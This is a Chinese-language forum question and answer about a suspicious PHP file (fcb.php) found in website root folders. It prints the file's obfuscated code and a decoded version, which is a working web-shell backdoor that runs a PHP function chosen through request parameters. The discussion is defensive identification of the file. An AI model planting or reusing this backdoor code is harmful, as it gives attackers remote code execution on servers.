这是我在每个网站文件夹的根目录下find的PHP脚本。 脚本名称是fcb.php
内容是:
<? $GLOBALS['_1303753477_']=Array(base64_decode('YX' .'JyYXlfZGlmZl91a2V5'),base64_decode('c3RyaXBz' .'bG' .'F' .'z' .'aGVz')); ?><? function _1935386521($i){$a=Array('cGFzc3dvcmQ=','cmVfcGFzc3dvcmQ=','bG9naW4=');return base64_decode($a[$i]);} ?><?php @$GLOBALS['_1303753477_'][0](@array((string)$_REQUEST[_1935386521(0)]=>round(0+0.25+0.25+0.25+0.25)),@array((string)$GLOBALS['_1303753477_'][1]($_REQUEST[_1935386521(1)])=>round(0+0.4+0.4+0.4+0.4+0.4)),$_REQUEST[_1935386521(2)]); ?>
有人可以解释这是什么吗? 谢谢。
它看起来像某种恶意软件。 我的PHP是生锈的; 就我能解读它而言,它看起来像这样:
<?php array_diff_ukey(@array((string)$_REQUEST[password]=>1), @array((string)stripslashes($_REQUEST[re_password])=>2), $_REQUEST[login]); ?>
然后,Googlesearch了什么“stripslashes $ _request re_password”,导致我有很多站点警告PHP后门程序。